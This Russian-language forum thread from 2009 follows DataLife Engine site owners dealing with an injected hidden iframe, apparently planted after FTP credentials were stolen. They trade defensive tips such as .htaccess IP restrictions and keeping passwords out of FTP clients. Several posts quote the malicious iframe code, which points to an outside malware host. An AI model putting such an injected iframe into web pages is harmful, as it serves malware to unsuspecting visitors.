zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 (изменено) кстати не факт что вот это <body><iframe src="http://q46.ru:8080/index.php" width=119 height=100 style="visibility: hidden"></iframe> появилось из-за крякнутого FTP-менеджер или еще каких нибудь программ....была у меня такая трабла ломанули хостера каким то образом и все сайты которые были на серваке все были в этих iframe ...=) Изменено 27 июля 2009 пользователем zimka Цитата Ссылка на сообщение Поделиться на других сайтах
webturist 6 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 + Защитите админку с помощью .htaccessВсмысле? 0_O WWW.ZEOS.IN <Files admin.php> deny from all allow from 000.000.000.000 </Files> Вместо нулей вписать свой IP. кстати не факт что вот это <body><iframe src="http://q46.ru:8080/index.php" width=119 height=100 style="visibility: hidden"></iframe> появилось из-за крякнутого FTP-менеджер или еще каких нибудь программ....была у меня такая трабла ломанули хостера каким то образом и все сайты которые были на серваке все были в этих iframe ...=) Что за хостер такой веселый? Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 (изменено) webturist, это не выход Например если модераторы есть на сайте, то тут надо будет прописывать всем IP адреса В адмминке DLE и так можно сделать запрет на все IP кроме своего. (это стандартная функция, так что ничего прописывать не надо) Изменено 27 июля 2009 пользователем WWW.ZEOS.IN Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Вообще хостиг http://multihost.ru/ не плохой, за 2 года ни каких нареканий.... работает четко стабильно вот одна трабла была с этими кодами, но они сами и решили ее восстановили полный бекап сервака и все) Цитата Ссылка на сообщение Поделиться на других сайтах
webturist 6 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 webturist, это не выход Например если модераторы есть на сайте, то тут надо будет прописывать всем IP адреса В адмминке DLE и так можно сделать запрет на все IP кроме своего. (это стандартная функция, так что ничего прописывать не надо) Я всем прописываю, апач он и в африке апач. Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту? Цитата Ссылка на сообщение Поделиться на других сайтах
webturist 6 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Вообще хостиг http://multihost.ru/ не плохой, за 2 года ни каких нареканий.... работает четко стабильно вот одна трабла была с этими кодами, но они сами и решили ее восстановили полный бекап сервака и все) Нет уж спасибо, если такая вещь имела место - то он уже ненадежный. кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту? Заходить после смены по ФТП и менять в .htaccess Не очень конечно, но надежно. Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 (изменено) Я всем прописываю, апач он и в африке апач.Знаю очень многих людей, которые подрабатывают модераторами и еще по основной работе ездят в командировки в разные города и страны. Так что, им постоянно IP менять? Нее, это не выход кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту?Тогда это точно не выход Изменено 27 июля 2009 пользователем WWW.ZEOS.IN Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Вообще хостиг http://multihost.ru/ не плохой, за 2 года ни каких нареканий.... работает четко стабильно вот одна трабла была с этими кодами, но они сами и решили ее восстановили полный бекап сервака и все) Нет уж спасибо, если такая вещь имела место - то он уже ненадежный. кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту? Заходить после смены по ФТП и менять в .htaccess Не очень конечно, но надежно. Ну не знаю это было один раз и думаю что там админа наказали))) А по поводу IP ну его....у меня стоит роутер и он в любой момент может пере подключиться к инету я запарюсь менять IP))) Цитата Ссылка на сообщение Поделиться на других сайтах
webturist 6 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Я всем прописываю, апач он и в африке апач.Знаю очень многих людей, которые подрабатывают модераторами и еще по основной работе ездят в командировки в разные города и страны. Так что, им постоянно IP менять? Нее, это не выход кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту?Тогда это точно не выход Мнения могут быть разными. Я исхожу из безопасности, а не из удобства модераторов, ездящих в командировки. Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 А по поводу IP ну его....у меня стоит роутер и он в любой момент может пере подключиться к инету я запарюсь менять IP)))Попросите у провайдера статичный IP. Я знаю уже наоборот - статичный, это стандарт, а чтобы менялся, это уже доплачивать надо А по поводу:Журналистам, размещающим новости на многих сайтах, вообще бы для своей работы виртуальный компьютер установить не мешало.Солгасен 100%. Только уже новые технологии, сейчас это называется: Песочница. Супер вещь! Бесплатная и победила рейтинги журнала ДПК Сайт: http://www.sandboxie.com/ Поддерживает русский язык Запускать внутри её можно хоть самый страшный троян в мире и всёравно ничё не будет, перезапустил программу и всё Есть много альтернатив, например, Returnil, но суть одна и таже Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 А по поводу IP ну его....у меня стоит роутер и он в любой момент может пере подключиться к инету я запарюсь менять IP)))Попросите у провайдера статичный IP. Я знаю уже наоборот - статичный, это стандарт, а чтобы менялся, это уже доплачивать надо У Вас может и так))) У Нас наоборот за то чтоб постоянный был нужно платить))) Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Подробнее про технологию тут: http://ru.wikipedia.org/wiki/Песочница_(безопасность) Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Подробнее про технологию тут: http://ru.wikipedia.org/wiki/Песочница_(безопасность) Че это ты продаешь свой шаблон? кстати видел у многих стоит он)) Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Причём тут мой шаблон к этому топику? Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Причём тут мой шаблон к этому топику? Думаю этот топ уже не актуален))) Цитата Ссылка на сообщение Поделиться на других сайтах
artremkozlov 0 Опубликовано: 28 июля 2009 Рассказать Опубликовано: 28 июля 2009 Подскажите пожалуйста кто-нибудь в чем проблема : при установке движка после "настройки конфигурации системы" нажимаю "далее" и вместо "установка успешно завершена" выдает ошибку The Error returned was: Access denied for user 'wm4760_artem'@'localhost' (using password: YES)" Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 28 июля 2009 Рассказать Опубликовано: 28 июля 2009 Не правильный логин пользователя или пароль к базе данных Цитата Ссылка на сообщение Поделиться на других сайтах
ogirok 0 Опубликовано: 28 июля 2009 Рассказать Опубликовано: 28 июля 2009 (изменено) Автор Из всего, понял, что нужно прописать IP. Но как писали выше, это не выход. Кстати, сегодня повторилась та же проблема, что описана выше. Опять <iframe src="http://q46.ru:8080/index.php" ........ Перезалил файлы, пока сайт работает. Пользуюсь Total Kommander. Ломаный или нет не знаю, кряков не запускал. Установил с скаченого exe-файла, работает, регистрацию не требует. Но совета послушаюсь. Переустановлю его на другой диск. Посмотрим, что будет дальше. Защита на компе Касперский Интернет Секьюрити. При входе в админку, пользуюсь виртуальной клавиатурой, что идет с Каспером или копипаст. Думаю, что трояны не просекут пароли Изменено 28 июля 2009 пользователем ogirok Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 28 июля 2009 Рассказать Опубликовано: 28 июля 2009 Из всего, понял, что нужно прописать IP. Но как писали выше, это не выход. Кстати, сегодня повторилась та же проблема, что описана выше. Опять <iframe src="http://q46.ru:8080/index.php" ........ Перезалил файлы, пока сайт работает. Пользуюсь Total Kommander. Ломаный или нет не знаю, кряков не запускал. Установил с скаченого exe-файла, работает, регистрацию не требует. Но совета послушаюсь. Переустановлю его на другой диск. Посмотрим, что будет дальше. Защита на компе Касперский Интернет Секьюрити. При входе в админку, пользуюсь виртуальной клавиатурой, что идет с Каспером или копипаст. Думаю, что трояны не просекут пароли Пароль к FTP не нужно хранить в тотале...тоесть при каждом конекте к FTP чтоб тотал спрашивал пароль и вводить его в ручную и тогда не будет этих iframe (если конечно сам хостер не заражен что мало вероятно но все таки может ) Цитата Ссылка на сообщение Поделиться на других сайтах
webturist 6 Опубликовано: 28 июля 2009 Рассказать Опубликовано: 28 июля 2009 (изменено) Из всего, понял, что нужно прописать IP. Но как писали выше, это не выход. Кстати, сегодня повторилась та же проблема, что описана выше. Опять <iframe src="http://q46.ru:8080/index.php" ........ Перезалил файлы, пока сайт работает. Пользуюсь Total Kommander. Ломаный или нет не знаю, кряков не запускал. Установил с скаченого exe-файла, работает, регистрацию не требует. Но совета послушаюсь. Переустановлю его на другой диск. Посмотрим, что будет дальше. Защита на компе Касперский Интернет Секьюрити. При входе в админку, пользуюсь виртуальной клавиатурой, что идет с Каспером или копипаст. Думаю, что трояны не просекут пароли 1. Сюда пошли iFrame, который на сайте прописывается: newvirus@kaspersky.com 2. Пока компьютер не почистишь - пароли будут известны. Если снова прописался - значит трой работает. 3. Copy-Paste - действительно может немного затруднить перехват, но ненадолго. Нужно придерживаться следующего порядка: 1. Сначала чистка компьютера или лучше переустановка ОС. Со всем необходимым + КИС, или КАВ + Агнитум 2. Установка ФТП-менеджера (бесплатного, типа FileZilla или лучше платного FlashFXP, (месяц демо бесплатно) стабильная версия с русским языком 3.6.0 на сайте разработчика) - в нестандартной папке. Настройка на незапоминание истории посещенных узлов и паролей. 3. Вход в панель управления хостинга и изменение пароля ФТП пользователя на сложный и длинный пароль. 4. Вход на сайт по ФТП и удаление кодов iFrame. Можно затем слить сайт себе на компьютер и прошерстить основательно, если время есть. 5. Добавление в .htaccess корня сайта следующего кода: <Files admin.php> deny from all allow from 000.000.000.000 </Files> Где admin.php - Ваш файл админки, если название изменено, соответственно изменить. Например tralivali.php : <Files tralivali.php> deny from all allow from 000.000.000.000 </Files> И где 000.000.000.000 - заменить на Ваш IP, который можно узнать здесь: 2ip.ru 6. Установите виртуальный компьютер + КИС или КАВ + Агнитум 7. Войдите на сайт через виртуальный компьютер и пройдитесь, если коды iFrame все вырезаны - то "визгов" защиты не будет. Все равно проверьте стартап системы. 8. Поменяйте пароли на все, что у Вас есть. Емайл, админка хостинга и так далее. 9. Можете наслаждаться работой отличного двигателя DataLife Engine на своем сайте без троянов. Примечания: 1. Не забудьте отослать код iFrame. 2. IP Модераторов придется прописать в .htaccess, если Вы им доверяете. Неудобства будут если у модераторов динамические IP. Если у Вас динамический IP - после каждой его смены надо будет менять его в .htaccess 3. Всегда храните пароли вне ФТП менеджера. 4. Никакая защита не гарантирует безопасность, если не придерживаться вышеприведенных правил. Даже если их придерживаться - 100% гарантии не существует. Но факт в том, что движок DLE тут непричем. Надеюсь эта инфа поможет тем кому это надо. P.S. Не пользуйтесь IE. Изменено 28 июля 2009 пользователем webturist Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 29 июля 2009 Рассказать Опубликовано: 29 июля 2009 webturist, ну это у вас черезчур уж... 2. Установка ФТП-менеджера (бесплатного, типа FileZilla или лучше платного FlashFXP, (месяц демо бесплатно) стабильная версия с русским языком 3.6.0 на сайте разработчика) - в нестандартной папке. Настройка на незапоминание истории посещенных узлов и паролей.мне больше нравится Total Commander, удобный и потом... если в компе трой, какой бы ни был у вас пароль и какой-бы программой не пользовались, пароль всё равно попадёт в чужие руки - в ftp он передаётся в незашифрованном виде Не пользуйтесь IEа чем тогда пользоваться?) Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 29 июля 2009 Рассказать Опубликовано: 29 июля 2009 Ни чего подобного!! Вы все говорите про IP admina в .htaccess а если IP меняется при каждом конекте? Нужно только одно пароли не хранить в FTP менеджере и все... храните его в текстовом документе в другом месте и вводить его ручками при каждом конекте... Цитата Ссылка на сообщение Поделиться на других сайтах
КиберБулка 2 Опубликовано: 29 июля 2009 Рассказать Опубликовано: 29 июля 2009 а чем тогда пользоваться?) Opera, лиса. IE - Достаточно бажный, в общем как и ось для нее. Цитата Ссылка на сообщение Поделиться на других сайтах
baxus 49 Опубликовано: 29 июля 2009 Рассказать Опубликовано: 29 июля 2009 Если бы все шли в ногу со временем то заметили бы что ИЕ 8 имеет даже два режима отображения сайта. Кривой сайт - кликнул и всё ОК. Также имеется 64 разрядная версия на ОС х64 Так что не сказал бы что ИЕ бажная, то что она не идёт на поводу у пользователей не делает её плохой, да и в принципе это самый используемый браузер. По мне так один большой баг это Опера. Которая диктует свои стандарты в разрез всем, как то: Рамочки оранжевые вокруг текстареа совершенно портящие вид дизайна. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.